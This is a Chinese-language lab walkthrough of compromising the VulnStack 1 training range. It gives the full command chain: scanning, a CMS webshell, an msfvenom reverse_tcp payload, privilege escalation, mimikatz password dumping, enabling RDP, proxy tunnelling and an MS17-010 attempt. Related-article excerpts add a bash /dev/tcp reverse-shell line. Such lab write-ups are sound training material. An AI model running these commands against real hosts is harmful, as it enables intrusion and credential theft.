红日-VulnStack靶场1

2023-12-23 09:00
文章标签 靶场 红日 vulnstack

本文主要是介绍红日-VulnStack靶场1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

红日-VulnStack靶场

注:此文章仅限于安全研究和教学,用户因阅读此文章而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

环境搭建

下载地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

首先创建一块仅主机的网卡,修改地址为192.168.52.0/24段ip
win7未边界
双网卡
net,ip为192.168.25.137
仅主机,仅主机网卡地址为192.168.52.143
windows server 2008
单网卡,仅主机,仅主机网卡地址为192.168.52.138
windows 2003
单网卡,仅主机,仅主机网卡地址为192.168.52.141

kali服务器
网卡net,ip为192.168.25.132

开始攻击

在这里插入图片描述
判断192.168.25.137为目标ip。对其进行端口扫描

 nmap -sV -p- 192.168.25.137

在这里插入图片描述
发现80,135,3306,对80端口发起访问

在这里插入图片描述
该端口为phpstudy探针页面,可以查看到敏感信息,如绝对路径,对其进行目录扫描

python3 dirmap.py -i http://192.168.25.137/ -lcf						//dirmap工具
python3 dirsearch.py -u http://192.168.25.137/ -x 301,400,404,403				//dirsearch工具

在这里插入图片描述
在这里插入图片描述

首先下载beifen.rar,然后访问phpmyadmin页面

在这里插入图片描述
解压后查看
在这里插入图片描述
发现yxcms同时在data中发现账号密码
在这里插入图片描述
对其进行登录
在这里插入图片描述
查找getshell方式

https://xz.aliyun.com/t/2025

对其进行getshell
在这里插入图片描述
这不得安排一个冰蝎上去?
在这里插入图片描述
安排
在这里插入图片描述
那我们就要找找shell在哪里了然后需要抓包了
在这里插入图片描述
发现Mname参数我们修改下

C:\phpStudy\WWW\yxcms\protected\apps/default/view/aaa/aaa.php			//报错了目录不对
C:\phpStudy\WWW\yxcms\protected\apps/default/view/default						//这样就是对的?

嗯哼?
在这里插入图片描述
上线在这里插入图片描述
接下来就要让他上线了
使用msfconsole生成木马,运行上线

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<监听ip> LPORT=<监听端口> -f exe -o 123.exe	   //生成exemsfconsole    //启动msfuse exploit/multi/handler 			//进入模块
set payload windows/meterpreter/reverse_tcp	//设置payload
set LHOST				//设置监听主机set LPoRT				//设置监听端口exploit						//运行

在这里插入图片描述
在这里插入图片描述通过冰蝎将生成的123.exe上传至服务器,并运行
在这里插入图片描述
在这里插入图片描述
上线成功
在这里插入图片描述
进行提权

getuid					//查看服务器权限
getsystem 			//提权
getuid 					//查看是否提权成功

在这里插入图片描述
将本地mimikatz上传

upload /root/work/mimikatz2.2-x64/mimikatz.exe		//为自己的目录
ls			//查看是否上传成功

在这里插入图片描述
在这里插入图片描述
运行抓取密码

execute -i -f mimikatz.exe			//进入交互页面
然后执行
privilege::debug
sekurlsa::logonpasswords


在这里插入图片描述
其中获取到明文密码
在这里插入图片描述
在这里开启rdp
run post/windows/manage/enable_rdp

然后我们搭建代理隧道
这里使用的工具为venom-master

./admin_linux_x64 -lport 7777			//vps开启监听
agent.exe -rhost 43.143.128.119 -rport 7777					//客户端进行连接

在这里插入图片描述在这里插入图片描述
在admin节点开启转发
在这里插入图片描述
然后在本地设置代理这里使用的是v2ray添加socks服务器

然后选择活动服务器,开启代理
这里需要注意看下靶机,有可能cpu爆满,导致隧道卡掉。
然后进行入节点获取shell进行扫描,这里换了地址换成了192.168.1.222

在这里插入图片描述
在这里插入图片描述
接下来我们对他的内网网段进行扫描,发现其他主机这里使用fscan,也可以使用arp -a来查看arp表
使用冰蝎上传fsacn
然后进行扫描
在这里插入图片描述

fscan.exe -h 192.168.52.0/24					//扫描

在这里插入图片描述
在这里插入图片描述
在kali服务器中也配置socks 代理
在这里插入图片描述
测试proxychains联通性
在这里插入图片描述

kali使用msfconsole中的相关模块进行攻击

proxychains4 msfconsole						//通过proxychamis4 启动msfconsole
use auxiliary/scanner/smb/smb_ms17_010 			//验证192.168.52.141是否存在ms17_010
set RHOSTS 192.168.52.141									//设置目标
run																			//运行use	1								//使用第一个模块
set RHOSTS 192.168.52.141	
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
同时可以使用

rdesktop -d GOD -u <抓到的用户> -p<抓到的密码>  192.168.52.143:3389						//对其进行登录


但是这里我的ms17_010没有攻击成功所以后面的步骤无法进行,按照思路的话,使用ms17_010攻击成功后可以拿到权限,进行权限提升
如果大家觉得这篇有点水的话推荐大佬链接,搭大家可以看下

https://blog.csdn.net/weixin_39190897/article/details/118353886

这篇关于红日-VulnStack靶场1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527474

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就